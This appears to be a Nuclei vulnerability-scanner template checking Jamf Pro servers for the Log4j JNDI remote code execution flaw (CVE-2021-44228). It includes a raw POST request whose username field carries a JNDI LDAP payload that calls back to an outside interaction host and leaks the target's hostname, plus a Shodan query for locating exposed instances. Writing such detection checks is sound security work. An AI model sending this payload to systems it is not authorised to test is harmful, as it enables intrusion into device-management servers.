61 lines
1.9 KiB
YAML
61 lines
1.9 KiB
YAML
id: jamf-pro-log4j-rce
|
|
|
|
info:
|
|
name: JamF Pro - Remote Code Execution (Apache Log4j)
|
|
author: DhiyaneshDK,pdteam
|
|
severity: critical
|
|
description: |
|
|
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
|
|
reference:
|
|
- https://github.com/random-robbie/jamf-log4j
|
|
- https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html
|
|
- https://community.connection.com/what-is-jamf/
|
|
- https://logging.apache.org/log4j/2.x/security.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2021-44228
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
shodan-query: title:"Jamf Pro"
|
|
verified: "true"
|
|
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<title>Jamf Pro Login</title>"
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: interactsh_request
|
|
group: 1
|
|
regex:
|
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
|
|
|
# Enhanced by mp on 2022/05/27
|